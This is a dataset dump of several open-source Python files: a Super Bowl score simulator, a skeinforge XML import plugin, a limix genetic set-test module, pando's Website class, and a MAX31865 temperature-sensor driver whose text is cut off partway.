code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 31 21:48:40 2017
@author: Alexander
"""
import pandas as pd
import numpy as np
import random
#Super Bowl Simulator
#Using Negative Binomial Disribution
#Alexander Booth
#January 31, 2017
#define data
pats_off = np.array([23, 31, 27, 0, 33, 35, 27, 41, 24, 30, 22, 26, 30, 16, 41, 35, 34, 36])
pats_def = np.array([21, 24, 0, 16, 13, 17, 16, 25, 31, 17, 17, 10, 23, 3, 3, 14, 16, 17])
falc_off = np.array([24, 35, 45, 48, 23, 24, 30, 33, 43, 15, 38, 28, 42, 41, 33, 38, 36, 44])
falc_def = np.array([31, 28, 32, 33, 16, 26, 33, 32, 28, 24, 19, 29, 14, 13, 16, 32, 20, 21])
scores_df = pd.DataFrame(data = { "Pats_Off" : pats_off, "Pats_Def" : pats_def, "Falc_Off" : falc_off, "Falc_Def" : falc_def})
#define simulator
def simulator(team1_off_mean, team1_def_mean, team2_off_mean, team2_def_mean, niterations):
#set seed for duplicity
random.seed(1234)
#set game arrays
team1_game_score = np.array(range(niterations))
team2_game_score = np.array(range(niterations))
team1_wins = np.array(range(niterations))
team2_wins = np.array(range(niterations))
size = 4
i = 0
while(i < niterations):
#sample from negative binomial for each statistic
team1_off = np.random.negative_binomial(size, size/(size+team1_off_mean), 1)
team1_def = np.random.negative_binomial(size, size/(size+team1_def_mean), 1)
team2_off = np.random.negative_binomial(size, size/(size+team2_off_mean), 1)
team2_def = np.random.negative_binomial(size, size/(size+team2_def_mean), 1)
#determine final game score
team1_score = round(np.mean(np.array([team1_off, team2_def])))
team2_score = round(np.mean(np.array([team2_off, team1_def])))
#Check for ties
if(team1_score == 1 or team2_score == 1):
continue
if(team1_score == team2_score):
continue
#record score
team1_game_score[i] = team1_score
team2_game_score[i] = team2_score
#record wins
if(team1_score > team2_score):
team1_wins[i] = 1
team2_wins[i] = 0
if(team2_score > team1_score):
team2_wins[i] = 1
team1_wins[i] = 0
i = i + 1
#determine win sum
team1_sum = sum(team1_wins)
team2_sum = sum(team2_wins)
#determine win percentage
team1_win_pcnt = team1_sum/float(niterations)
team2_win_pcnt = team2_sum/float(niterations)
#return array of percentages, mean scores, and standard deviations
return(np.array([team1_win_pcnt, team2_win_pcnt, np.mean(team1_game_score), np.mean(team2_game_score), np.std(team1_game_score), np.std(team2_game_score)]))
#simulate super bowl
pats_off_mean = np.mean(pats_off)
pats_def_mean = np.mean(pats_def)
falc_off_mean = np.mean(falc_off)
falc_def_mean = np.mean(falc_def)
niterations = 100000
final_scores = simulator(pats_off_mean, pats_def_mean, falc_off_mean, falc_def_mean, niterations)
print(final_scores) | ABoothInTheWild/baseball-research | pats_falcons_simulator_python.py | Python | gpl-3.0 | 3,034 |
"""
This page is in the table of contents.
The xml.py script is an import translator plugin to get a carving from an xml file.
An import plugin is a script in the interpret_plugins folder which has the function getCarving. It is meant to be run from the interpret tool. To ensure that the plugin works on platforms which do not handle file capitalization properly, give the plugin a lower case name.
The getCarving function takes the file name of an xml file and returns the carving.
An example of an xml boolean geometry format file follows below.
<?xml version='1.0' ?>
<fabmetheus version="2010-03-29">
<difference id="cube_cylinder_difference">
<matrix m14="-10.0" m24="20.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</difference>
</fabmetheus>
In the 'fabmetheus' format, all class names are lower case. The defined geometric objects are cube, cylinder, difference, group, sphere, trianglemesh and union. The id attribute is not necessary. The default matrix is a four by four identity matrix. The attributes of the cube, cylinder and sphere default to one. The attributes of the vertexes in the triangle mesh default to zero. The boolean solids are difference, intersection and union. The difference solid is the first solid minus the remaining solids. The combined_shape.xml example in the xml_models folder in the models folder is pasted below.
<?xml version='1.0' ?>
<fabmetheus version="2010-03-29">
<difference id="cube_cylinder_difference">
<matrix m14="-10.0" m24="20.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</difference>
<intersection id="cube_cylinder_intersection">
<matrix m14="-10.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</intersection>
<union id="cube_cylinder_union">
<matrix m14="-10.0" m24="-20.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</union>
<group id="sphere_tetrahedron_group">
<matrix m14="10.0" m24="-20.0" m34="5.0" />
<sphere id="Group Sphere 5" radiusx="5.0" radiusy="5.0" radiusz="5.0">
</sphere>
<trianglemesh id="Group Tetrahedron 5">
<matrix m14="15.0" />
<vertex x="-5.0" y="-5.0" z="-5.0" />
<vertex x="5.0" y="-5.0" z="-5.0" />
<vertex y="5.0" z="-5.0" />
<vertex z="5.0" />
<face vertex0="0" vertex1="2" vertex2="1" />
<face vertex0="3" vertex1="1" vertex2="2" />
<face vertex0="3" vertex1="2" vertex2="0" />
<face vertex0="3" vertex1="0" vertex2="1" />
</trianglemesh>
</group>
<sphere id="Sphere 5" radiusx="5.0" radiusy="5.0" radiusz="5.0">
<matrix m14="10.0" m34="5.0" />
</sphere>
<trianglemesh id="Tetrahedron 5">
<matrix m14="10.0" m24="20.0" m34="5.0" />
<vertex x="-5.0" y="-5.0" z="-5.0" />
<vertex x="5.0" y="-5.0" z="-5.0" />
<vertex y="5.0" z="-5.0" />
<vertex z="5.0" />
<face vertex0="0" vertex1="2" vertex2="1" />
<face vertex0="3" vertex1="1" vertex2="2" />
<face vertex0="3" vertex1="2" vertex2="0" />
<face vertex0="3" vertex1="0" vertex2="1" />
</trianglemesh>
</fabmetheus>
The 'fabmetheus' xml format is the preferred skeinforge format. When the Interpret button in the Interpret tool in Analyze is clicked, any xml format for which there is a plugin will be converted to the 'fabmetheus' format.
There is a plugin for the 'Art of Illusion' xml format. An xml file can be exported from Art of Illusion by going to the "File" menu, then going into the "Export" menu item, then picking the XML choice. This will bring up the XML file chooser window, choose a place to save the file then click "OK". Leave the "compressFile" checkbox unchecked. All the objects from the scene will be exported, the artofillusion plugin will ignore the light and camera. If you want to fabricate more than one object at a time, you can have multiple objects in the Art of Illusion scene and they will all be carved, then fabricated together.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.xml_simple_reader import DocumentNode
from fabmetheus_utilities import archive
from fabmetheus_utilities import gcodec
import os
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__credits__ = 'Nophead <http://hydraraptor.blogspot.com/>\nArt of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getCarving(fileName=''):
"Get the carving for the xml file."
xmlText = archive.getFileText(fileName)
if xmlText == '':
return None
xmlParser = DocumentNode(fileName, xmlText)
lowerLocalName = xmlParser.getDocumentElement().getNodeName().lower()
pluginModule = archive.getModuleWithDirectoryPath( getPluginsDirectoryPath(), lowerLocalName )
if pluginModule == None:
return None
return pluginModule.getCarvingFromParser( xmlParser )
def getPluginsDirectoryPath():
"Get the plugins directory path."
return archive.archive.getInterpretPluginsPath('xml_plugins')
def main():
"Display the inset dialog."
if len(sys.argv) > 1:
getCarving(' '.join(sys.argv[1 :]))
if __name__ == "__main__":
main()
| Pointedstick/ReplicatorG | skein_engines/skeinforge-44/fabmetheus_utilities/fabmetheus_tools/interpret_plugins/xml.py | Python | gpl-2.0 | 5,903 |
import sys
import limix
from limix.core.covar import LowRankCov
from limix.core.covar import FixedCov
from limix.core.covar import FreeFormCov
from limix.core.covar import CategoricalLR
from limix.core.mean import MeanBase
from limix.core.gp import GP
import scipy as sp
import scipy.stats as st
from limix.mtSet.core.iset_utils import *
import numpy as np
import numpy.linalg as nla
import scipy.linalg as la
import copy
import pdb
from limix.utils.preprocess import gaussianize
from scipy.optimize import fmin
import time
import pandas as pd
from .linalg_utils import msqrt
from .linalg_utils import lowrank_approx
ntype_dict = {'assoc':'null', 'gxe':'block', 'gxehet':'rank1'}
def define_gp(Y, Xr, mean, Ie, type):
P = 2
if type=='null':
_Cr = FixedCov(sp.ones([2, 2]))
_Cr.scale = 1e-9
_Cr.act_scale = False
covar = CategoricalLR(_Cr, sp.ones((Xr.shape[0], 1)), Ie)
else:
if type=='block': _Cr = FixedCov(sp.ones((P,P)))
elif type=='rank1': _Cr = LowRankCov(P,1)
elif type=='full': _Cr = FreeFormCov(P)
else: print('poppo')
covar = CategoricalLR(_Cr, Xr, Ie)
_gp = GP(covar=covar, mean=mean)
return _gp
class MvSetTestInc():
def __init__(self, Y=None, Xr=None, F=None, factr=1e7, Ie=None, debug=False):
"""
Args:
Y: [N, 1] phenotype matrix
Xr: [N, S] genotype data of the set component
R: [N, S] genotype data of the set component
factr: paramenter that determines the accuracy of the solution
(see scipy.optimize.fmin_l_bfgs_b for more details)
"""
if F is None:
F = sp.ones((y.shape[0], 1))
# kroneckerize F
W = sp.zeros((Y.shape[0], 2*F.shape[1]))
W[:, :F.shape[1]] = Ie[:, sp.newaxis] * F
W[:, F.shape[1]:] = (~Ie[:, sp.newaxis]) * F
self.mean = MeanBase(Y, W)
# avoid SVD failus by adding some jitter
Xr+= 2e-6*(sp.rand(*Xr.shape)-0.5)
# store stuff
Xr-= Xr.mean(0)
Xr/= Xr.std(0)
Xr/= sp.sqrt(Xr.shape[1])
self.Y = Y
self.F = F
self.Xr = Xr
self.Ie = Ie
self.covY = sp.cov(Y.T)
self.factr = factr
self.debug = debug
self.gp = {}
self.info = {}
def assoc(self):
# fit model
for key in ['null', 'full']:
if key not in list(self.gp.keys()):
if self.debug: print('.. dening %s' % key)
self.gp[key] = define_gp(self.Y, self.Xr, self.mean, self.Ie, key)
if self.debug: print('.. fitting %s' % key)
self.info[key] = self._fit(key, vc=True)
return self.info['null']['LML']-self.info['full']['LML']
def gxe(self):
# fit model
for key in ['null', 'full', 'block']:
if key not in list(self.gp.keys()):
if self.debug: print('.. defining %s' % key)
self.gp[key] = define_gp(self.Y, self.Xr, self.mean, self.Ie, key)
if self.debug: print('.. fitting %s' % key)
self.info[key] = self._fit(key, vc=True)
return self.info['block']['LML']-self.info['full']['LML']
def gxehet(self):
# fit model
for key in ['null', 'full', 'rank1']:
if key not in list(self.gp.keys()):
if self.debug: print('.. defining %s' % key)
self.gp[key] = define_gp(self.Y, self.Xr, self.mean, self.Ie, key)
if self.debug: print('.. fitting %s' % key)
self.info[key] = self._fit(key, vc=True)
return self.info['rank1']['LML']-self.info['full']['LML']
def assoc_null(self, n_nulls=30):
LLR0 = sp.zeros(n_nulls)
for ni in range(n_nulls):
idx_perms = sp.random.permutation(self.Y.shape[0])
_Xr = self.Xr[idx_perms]
mvset0 = MvSetTestInc(Y=self.Y, F=self.F, Xr=_Xr, Ie=self.Ie)
LLR0[ni] = mvset0.assoc()
return LLR0
def gxe_null(self, n_nulls=30):
LLR0 = sp.zeros(n_nulls)
for ni in range(n_nulls):
Xb = sp.dot(self.mean.W, self.mean.b)
_Y = Xb+self.gp['block'].covar.Kh_dot(sp.randn(self.Y.shape[0],1))
mvset0 = MvSetTestInc(Y=_Y, F=self.F, Xr=self.Xr, Ie=self.Ie)
LLR0[ni] = mvset0.gxe()
return LLR0
def gxehet_null(self, n_nulls=30):
LLR0 = sp.zeros(n_nulls)
for ni in range(n_nulls):
Xb = sp.dot(self.mean.W, self.mean.b)
_Y = Xb+self.gp['rank1'].covar.Kh_dot(sp.randn(self.Y.shape[0],1))
mvset0 = MvSetTestInc(Y=_Y, F=self.F, Xr=self.Xr, Ie=self.Ie)
LLR0[ni] = mvset0.gxehet()
return LLR0
def _fit(self, type, vc=False):
#2. init
if type=='null':
self.gp[type].covar.Cn.setCovariance(sp.eye(2))
elif type=='full':
Cr0_K = 1e-4*sp.ones((2,2))+1e-4*sp.eye(2)
Cn0_K = 0.99*self.gp['null'].covar.Cn.K()
self.gp[type].covar.Cr.setCovariance(Cr0_K)
self.gp[type].covar.Cn.setCovariance(Cn0_K)
elif type=='block':
Crf_K = self.gp['full'].covar.Cr.K()
Cnf_K = self.gp['full'].covar.Cn.K()
self.gp[type].covar.Cr.scale = sp.mean(Crf_K)
self.gp[type].covar.Cn.setCovariance(Cnf_K)
elif type=='rank1':
Crf_K = self.gp['full'].covar.Cr.K()
Cnf_K = self.gp['full'].covar.Cn.K()
self.gp[type].covar.Cr.setCovariance(Crf_K)
self.gp[type].covar.Cn.setCovariance(Cnf_K)
else:
print('poppo')
conv = self.gp[type].optimize(factr=self.factr, verbose=False)[0]
B = self.gp[type].mean.b.reshape((self.mean.W.shape[1]/2,2), order='F')
RV = {'Cr': self.gp[type].covar.Cr.K(),
'Cn': self.gp[type].covar.Cn.K(),
'B': B,
'conv': sp.array([conv]),
'LML': sp.array([self.gp[type].LML()]),
'LMLgrad': sp.array([sp.mean((self.gp[type].LML_grad()['covar'])**2)])}
if vc:
# tr(P WW) = tr(PWWP) = ((PW)**2).sum()
# tr(P D) = (PD).sum() = D.sum() - 1/n * (Ones*D).sum()
# = D.sum() - D.sum()
PW = self.gp[type].covar.W()
PW-= PW.mean(0)
var_r = (PW**2).sum()/ float(self.Y.size-1)
var_c = sp.var(sp.dot(self.mean.W, self.gp[type].mean.b))
D = self.gp[type].covar.d_inv()**(-1)
var_n = (1-1/float(D.shape[0]))*D.sum()/float(self.Y.size-1)
#var_n = sp.diagonal(sp.diag(D)-sp.diag(D).mean(0)).sum()/float(self.Y.size-1)
RV['var'] = sp.array([var_r, var_c, var_n])
if 0 and self.Y.size<5000:
pdb.set_trace()
Kr = sp.kron(RV['Cr'], sp.dot(self.Xr, self.Xr.T))
Kn = sp.kron(RV['Cn'], sp.eye(self.Y.shape[0]))
_var_r = sp.trace(Kr-Kr.mean(0)) / float(self.Y.size-1)
_var_n = sp.trace(Kn-Kn.mean(0)) / float(self.Y.size-1)
_var = sp.array([_var_r, var_c, _var_n])
print(((_var-RV['var'])**2).mean())
if type=='full':
trRr = (self.Xr**2).sum()
# calculate within region vcs
Cr_block = sp.mean(RV['Cr']) * sp.ones(RV['Cr'].shape)
Cr_rank1 = lowrank_approx(RV['Cr'], rank=1)
var_block = sp.trace(Cr_block)*trRr / float(self.Y.size-1)
var_rank1 = sp.trace(Cr_rank1)*trRr / float(self.Y.size-1)
RV['var_r'] = sp.array([var_block, var_rank1-var_block, var_r-var_rank1])
return RV
if 0:
def _sim_from(self, set_covar='block', seed=None, qq=False):
##1. region term
if set_covar=='block':
Cr = self.block['Cr']
Cg = self.block['Cg']
Cn = self.block['Cn']
if set_covar=='rank1':
Cr = self.lr['Cr']
Cg = self.lr['Cg']
Cn = self.lr['Cn']
Lc = msqrt(Cr)
U, Sh, V = nla.svd(self.Xr, full_matrices=0)
Lr = sp.zeros((self.Y.shape[0], self.Y.shape[0]))
Lr[:, :Sh.shape[0]] = U * Sh[sp.newaxis, :]
Z = sp.randn(*self.Y.shape)
Yr = sp.dot(Lr, sp.dot(Z, Lc.T))
##2. bg term
Lc = msqrt(Cg)
Lr = self.XXh
Z = sp.randn(*self.Y.shape)
Yg = sp.dot(Lr, sp.dot(Z, Lc.T))
# noise terms
Lc = msqrt(Cn)
Z = sp.randn(*self.Y.shape)
Yn = sp.dot(Z, Lc.T)
# normalize
Y = Yr + Yg + Yn
if qq:
Y = gaussianize(Y)
Y-= Y.mean(0)
Y/= Y.std(0)
return Y
if __name__=='__main__':
if 1:
N = 1000
S = 20
Xr = 1.*(sp.rand(N,S)<0.2)
Ie = sp.randn(N)<0.
Y = sp.randn(N, 1)
F = sp.ones((N,1))
pdb.set_trace()
t0 = time.time()
mvset = MvSetTestInc(Y=Y, Xr=Xr, F=F, Ie=Ie, factr=1e7)
mvset.assoc()
mvset.gxe()
mvset.gxehet()
print('.. permutations')
mvset.assoc_null()
print('.. bootstrap gxe')
mvset.gxe_null()
print('.. bootstrap gxehet')
mvset.gxehet_null()
print(time.time()-t0)
pdb.set_trace()
| PMBio/limix | limix/iSet/mvSetInc.py | Python | apache-2.0 | 9,524 |
"""
:mod:`website`
==============
"""
from copy import copy
from datetime import datetime, timezone
import os
import string
from urllib.parse import quote
from aspen.request_processor import RequestProcessor
from aspen.simplates.simplate import Simplate
from state_chain import StateChain
from . import body_parsers
from .http.request import SAFE_METHODS
from .http.response import Response
from .utils import maybe_encode, to_rfc822
from .exceptions import BadLocation
# 2006-11-17 was the first release of Aspen - v0.3
THE_PAST = to_rfc822(datetime(2006, 11, 17, tzinfo=timezone.utc))
PANDO_DIR = os.path.dirname(os.path.abspath(__file__))
class Website:
"""Represent a website.
This object holds configuration information, and how to handle HTTP
requests (per WSGI). It is available to user-developers inside of their
simplates and state chain functions.
:arg kwargs: configuration values. The available options and their default
values are described in :class:`pando.website.DefaultConfiguration`
and :class:`aspen.request_processor.DefaultConfiguration`.
"""
def __init__(self, **kwargs):
#: An Aspen :class:`~aspen.request_processor.RequestProcessor` instance.
self.request_processor = RequestProcessor(**kwargs)
pando_resources_dir = os.path.join(PANDO_DIR, 'www')
self.request_processor.resource_directories.append(pando_resources_dir)
pando_chain = StateChain.from_dotted_name('pando.state_chain')
pando_chain.functions = [
getattr(f, 'placeholder_for', f) for f in pando_chain.functions
]
#: The chain of functions used to process an HTTP request, imported from
#: :mod:`pando.state_chain`.
self.state_chain = pando_chain
# configure from defaults and kwargs
defaults = [(k, v) for k, v in DefaultConfiguration.__dict__.items() if k[0] != '_']
for name, default in sorted(defaults):
if name in kwargs:
self.__dict__[name] = kwargs[name]
else:
self.__dict__[name] = copy(default)
# add ourself to the initial context of simplates
Simplate.defaults.initial_context['website'] = self
# load bodyparsers
#: Mapping of content types to parsing functions.
self.body_parsers = {
"application/x-www-form-urlencoded": body_parsers.formdata,
"multipart/form-data": body_parsers.formdata,
self.request_processor.media_type_json: body_parsers.jsondata
}
def __call__(self, environ, start_response):
"""Alias of :meth:`wsgi_app`.
"""
return self.wsgi_app(environ, start_response)
def wsgi_app(self, environ, start_response):
"""WSGI interface.
Wrap this method (instead of the website object itself) when you want
to use WSGI middleware::
website = Website()
website.wsgi_app = WSGIMiddleware(website.wsgi_app)
"""
response = self.respond(environ)['response']
return response.to_wsgi(environ, start_response, self.request_processor.encode_output_as)
def respond(self, environ, raise_immediately=None, return_after=None):
"""Given a WSGI environ, return a state dict.
"""
return self.state_chain.run(
website=self,
environ=environ,
_raise_immediately=raise_immediately,
_return_after=return_after,
)
def redirect(self, location, code=None, permanent=False, base_url=None, response=None):
"""Raise a redirect Response.
If code is None then it will be set to 301 (Moved Permanently) if
permanent is True and 302 (Found) if it is False. If url doesn't start
with base_url (defaulting to self.base_url), then we prefix it with
base_url before redirecting. This is a protection against open
redirects. If you wish to use a relative path or full URL as location,
then base_url must be the empty string; if it's not, we raise
BadLocation. If you provide your own response we will set .code and
.headers['Location'] on it.
"""
response = response if response else Response()
response.code = code if code else (301 if permanent else 302)
base_url = base_url if base_url is not None else self.base_url
location = quote(location, string.punctuation)
if not location.startswith(base_url):
newloc = base_url + location
if not location.startswith('/'):
raise BadLocation(newloc)
location = newloc
response.headers[b'Location'] = maybe_encode(location)
raise response
# Base URL Canonicalization
# =========================
_canonicalize_base_url_code_for_safe_method = 302
_canonicalize_base_url_code_for_unsafe_method = 307
def canonicalize_base_url(self, request):
"""Enforces a base_url such as http://localhost:8080 (no path part).
See :attr:`.Request.host` and :attr:`.Request.scheme` for how the
request host and scheme are determined.
"""
if not self.base_url:
return
request_base_url = request.scheme + "://" + request.host
if request_base_url == self.base_url:
return
url = self.base_url + request.path.raw
if request.qs:
url += '?' + request.qs.raw
if request.method in SAFE_METHODS:
code = self._canonicalize_base_url_code_for_safe_method
else:
code = self._canonicalize_base_url_code_for_unsafe_method
self.redirect(url, code=code)
# File Resolution
# ===============
def find_ours(self, filename):
"""Given a ``filename``, return the filepath to pando's internal version
of that filename.
No existence checking is done, this just abstracts away the ``__file__``
reference nastiness.
"""
return os.path.join(PANDO_DIR, 'www', filename)
def ours_or_theirs(self, filename):
"""Given a filename, return a filepath or ``None``.
It looks for the file in :attr:`self.project_root`, then in Pando's
default files directory. ``None`` is returned if the file is not found
in either location.
"""
if self.project_root is not None:
theirs = os.path.join(self.project_root, filename)
if os.path.isfile(theirs):
return theirs
ours = self.find_ours(filename)
if os.path.isfile(ours):
return ours
return None
# Backward compatibility
# ======================
@property
def default_renderers_by_media_type(self):
"Reference to :obj:`Simplate.default_renderers_by_media_type`, for backward compatibility."
return Simplate.default_renderers_by_media_type
@property
def project_root(self):
"Reference to :obj:`self.request_processor.project_root`, for backward compatibility."
return self.request_processor.project_root
@property
def renderer_factories(self):
"Reference to :obj:`Simplate.renderer_factories`, for backward compatibility."
return Simplate.renderer_factories
@property
def www_root(self):
"Reference to :obj:`self.request_processor.www_root`, for backward compatibility."
return self.request_processor.www_root
class DefaultConfiguration:
"""Default configuration of :class:`Website` objects.
"""
base_url = ''
"""
The website's base URL (scheme and host only, no path). If specified, then
requests for URLs that don't match it are automatically redirected. For
example, if ``base_url`` is ``https://example.net``, then a request for
``http://www.example.net/foo`` is redirected to ``https://example.net/foo``.
"""
colorize_tracebacks = True
"Use the Pygments package to prettify tracebacks with syntax highlighting."
known_schemes = {'http', 'https', 'ws', 'wss'}
"""
The set of known and acceptable request URL schemes. Used by
:attr:`.Request.scheme`.
"""
list_directories = False
"List the contents of directories that don't have a custom index."
show_tracebacks = False
"Show Python tracebacks in error responses."
trusted_proxies = []
"""
The list of reverse proxies that requests to this website go through. With
this information we can accurately determine where a request came from (i.e.
the IP address of the client) and how it was sent (i.e. encrypted or in
plain text).
Example::
trusted_proxies=[
['private'],
[IPv4Network('1.2.3.4/32'), IPv6Network('2001:2345:6789:abcd::/64')]
]
Explanation: :attr:`trusted_proxies` is a list of proxy levels, with each
item being a list of IP networks (:class:`~ipaddress.IPv4Network` or
:class:`~ipaddress.IPv6Network` objects). The special value :obj:`'private'`
can be used to indicate that any private IP address is trusted (the
:attr:`~ipaddress.IPv4Address.is_private` attribute is used to determine
if an IP address is private, both IPv4 and IPv6 are supported).
"""
| gratipay/aspen.py | pando/website.py | Python | mit | 9,310 |
# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
import stock_to_date
| Elico-Corp/openerp-7.0 | wms/wizard/__init__.py | Python | agpl-3.0 | 165 |
#!/usr/bin/python
#The MIT License (MIT)
#
#Copyright (c) 2015 Stephen P. Smith
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import time, math
import RPi.GPIO as GPIO
#import numpy
class max31865(object):
"""Reading Temperature from the MAX31865 with GPIO using
the Raspberry Pi. Any pins can be used.
Numpy can be used to completely solve the Callendar-Van Dusen equation
but it slows the temp reading down. I commented it out in the code.
Both the quadratic formula using Callendar-Van Dusen equation (ignoring the
3rd and 4th degree parts of the polynomial) and the straight line approx.
temperature is calculated with the quadratic formula one being the most accurate.
"""
def __init__(self, csPin = 8, misoPin = 9, mosiPin = 10, clkPin = 11):
self.csPin = csPin
self.misoPin = misoPin
self.mosiPin = mosiPin
self.clkPin = clkPin
self.rRefCoeff = 1.0
self.rRefOffset = 0.0
self.setupGPIO()
def setCal(self, rAt0C = 100.0, rAt100C = 138.51):
R0C_IDEAL = 100.0
R100C_IDEAL = 138.51
self.rRefCoeff = (R100C_IDEAL - R0C_IDEAL) / (rAt100C - rAt0C)
self.rRefOffset = R0C_IDEAL - self.rRefCoeff * rAt0C
# print ("m=%f b=%f"%(self.rRefCoeff, self.rRefOffset))
def setupGPIO(self):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.csPin, GPIO.OUT)
GPIO.setup(self.misoPin, GPIO.IN)
GPIO.setup(self.mosiPin, GPIO.OUT)
GPIO.setup(self.clkPin, GPIO.OUT)
GPIO.output(self.csPin, GPIO.HIGH)
GPIO.output(self.clkPin, GPIO.LOW)
GPIO.output(self.mosiPin, GPIO.LOW)
def readTemp(self):
#
# b10000000 = 0x80
# 0x8x to specify 'write register value'
# 0xx0 to specify 'configuration register'
#
# 0b10110010 = 0xB2
# Config Register
# ---------------
# bit 7: Vbias -> 1 (ON)
# bit 6: Conversion Mode -> 0 (MANUAL)
# bit5: 1-shot ->1 (ON)
# bit4: 3-wire select -> 1 (3 wire config)
# bits 3-2: fault detection cycle -> 0 (none)
# bit 1: fault status clear -> 1 (clear any fault)
# bit 0: 50/60 Hz filter select -> 0 (60Hz)
#
# 0b11010010 or 0xD2 for continuous auto conversion
# at 60Hz (faster conversion)
#
#one shot
self.writeRegister(0, 0xB2)
#Continuous
# self.writeRegister(0, 0xD2)
# conversion time is less than 100ms
time.sleep(.1) #give it 100ms for conversion
# time.sleep(10) #give it 100ms for conversion
# read all registers
out = self.readRegisters(0,8)
conf_reg = out[0]
#print "config register byte: %x" % conf_reg
[rtd_msb, rtd_lsb] = [out[1], out[2]]
#print "RTD bytes: %02X%02X"%(rtd_msb, rtd_lsb)
rtd_ADC_Code = (( rtd_msb << 8 ) | rtd_lsb ) >> 1
temp_C = self.calcPT100Temp(rtd_ADC_Code)
[hft_msb, hft_lsb] = [out[3], out[4]]
hft = (( hft_msb << 8 ) | hft_lsb ) >> 1
#print "high fault threshold: %d" % hft
[lft_msb, lft_lsb] = [out[5], out[6]]
lft = (( lft_msb << 8 ) | lft_lsb ) >> 1
#print "low fault threshold: %d" % lft
status = out[7]
#
# 10 Mohm resistor is on breakout board to help
# detect cable faults
# bit 7: RTD High Threshold / cable fault open
# bit 6: RTD Low Threshold / cable fault short
# bit 5: REFIN- > 0.85 x VBias -> must be requested
# bit 4: REFIN- < 0.85 x VBias (FORCE- open) -> must be requested
# bit 3: RTDIN- < 0.85 x VBias (FORCE- open) -> must be requested
# bit 2: Overvoltage / undervoltage fault
# bits 1,0 don't care
#print "Status byte: %x" % status
if ((status & 0x80) == 1):
raise FaultError("High threshold limit (Cable fault/open)")
if ((status & 0x40) == 1):
raise FaultError("Low threshold limit (Cable fault/short)")
if ((status & 0x04) == 1):
raise FaultError("Overvoltage or Undervoltage Error")
return temp_C
def writeRegister(self, regNum, dataByte):
GPIO.output(self.csPin, GPIO.LOW)
# 0x8x to specify 'write register value'
addressByte = 0x80 | regNum;
# first byte is address byte
self.sendByte(addressByte)
# the rest are data bytes
self.sendByte(dataByte)
GPIO.output(self.csPin, GPIO.HIGH)
def readRegisters(self, regNumStart, numRegisters):
out = []
GPIO.output(self.csPin, GPIO.LOW)
# 0x to specify 'read register value'
self.sendByte(regNumStart)
for byte in range(numRegisters):
data = self.recvByte()
out.append(data)
GPIO.output(self.csPin, GPIO.HIGH)
return out
def sendByte(self,byte):
for bit in range(8):
GPIO.output(self.clkPin, GPIO.HIGH)
if (byte & 0x80):
GPIO.output(self.mosiPin, GPIO.HIGH)
else:
GPIO.output(self.mosiPin, GPIO.LOW)
byte <<= 1
GPIO.output(self.clkPin, GPIO.LOW)
def recvByte(self):
byte = 0x00
for bit in range(8):
GPIO.output(self.clkPin, GPIO.HIGH)
byte <<= 1
if GPIO.input(self.misoPin):
byte |= 0x1
GPIO.output(self.clkPin, GPIO.LOW)
return byte
def calcPT100Temp(self, RTD_ADC_Code):
R_REF = 400.0 # Reference Resistor
Res0 = 100.0; # Resistance at 0 degC for 400ohm R_Ref
a = .00390830
b = -.000000577500
# c = -4.18301e-12 # for -200 <= T <= 0 (degC)
c = -0.00000000000418301
# c = 0 # for 0 <= T <= 850 (degC)
#print "RTD ADC Code: %d" % RTD_ADC_Code
Res_RTD = (RTD_ADC_Code * R_REF) / 32768.0 # PT100 Resistance
#print "PT100 Resistance uncalibrated: %f ohms" % Res_RTD
Res_RTD = Res_RTD * self.rRefCoeff + self.rRefOffset
#print "PT100 Resistance calibrated: %f ohms" % Res_RTD
#
# Callendar-Van Dusen equation
# Res_RTD = Res0 * (1 + a*T + b*T**2 + c*(T-100)*T**3)
